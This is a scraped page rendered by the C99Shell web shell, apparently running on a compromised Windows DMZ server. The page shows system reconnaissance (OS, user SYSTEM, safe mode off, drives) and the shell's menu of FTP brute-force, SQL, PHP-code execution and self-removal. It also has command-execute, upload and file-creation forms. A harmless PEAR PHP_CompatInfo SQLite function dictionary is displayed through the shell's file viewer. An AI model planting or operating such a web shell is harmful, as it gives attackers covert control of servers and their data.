!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\dmz\php\pear\PHP\CompatInfo\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SQLite_func_array.php (5.54 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * SQLite extension Function dictionary for PHP_CompatInfo 1.9.0b2 or better
 *
 * PHP versions 4 and 5
 *
 * @category PHP
 * @package  PHP_CompatInfo
 * @author   Davey Shafik <davey@php.net>
 * @author   Laurent Laville <pear@laurent-laville.org>
 * @license  http://www.opensource.org/licenses/bsd-license.php  BSD
 * @version  CVS: $Id: SQLite_func_array.php,v 1.1 2008/12/14 17:18:18 farell Exp $
 * @link     http://pear.php.net/package/PHP_CompatInfo
 * @since    version 1.9.0b2 (2008-12-19)
 */

$GLOBALS['_PHP_COMPATINFO_FUNC_SQLITE'] = array (
  
'sqlite_array_query' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_busy_timeout' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_changes' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_close' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_column' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_create_aggregate' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_create_function' =>
  array (
    
'init' => '4.0.0',
    
'name' => 'sqlite_create_function',
    
'ext' => 'SQLite',
    
'pecl' => false,
  ),
  
'sqlite_current' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_error_string' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_escape_string' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_exec' =>
  array (
    
'init' => '1.0.3',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_factory' =>
  array (
    
'init' => '5.0.0',
    
'ext' => 'SQLite',
    
'pecl' => false,
  ),
  
'sqlite_fetch_all' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_fetch_array' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_fetch_column_types' =>
  array (
    
'init' => '5.0.0',
    
'ext' => 'SQLite',
    
'pecl' => false,
  ),
  
'sqlite_fetch_object' =>
  array (
    
'init' => '5.0.0',
    
'ext' => 'SQLite',
    
'pecl' => false,
  ),
  
'sqlite_fetch_single' =>
  array (
    
'init' => '1.0.1',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_fetch_string' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_field_name' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_has_more' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_has_prev' =>
  array (
    
'init' => '5.0.0',
    
'ext' => 'SQLite',
    
'pecl' => false,
  ),
  
'sqlite_last_error' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_last_insert_rowid' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_libencoding' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_libversion' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_next' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_num_fields' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_num_rows' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_open' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_popen' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_prev' =>
  array (
    
'init' => '5.0.0',
    
'ext' => 'SQLite',
    
'pecl' => false,
  ),
  
'sqlite_query' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_rewind' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_seek' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_single_query' =>
  array (
    
'init' => '1.0.1',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_udf_decode_binary' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_udf_encode_binary' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_unbuffered_query' =>
  array (
    
'init' => '1.0',
    
'end' => '1.0.3',
    
'ext' => 'SQLite',
    
'pecl' => true,
  ),
  
'sqlite_valid' =>
  array (
    
'init' => '5.0.0',
    
'ext' => 'SQLite',
    
'pecl' => false,
  ),
);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--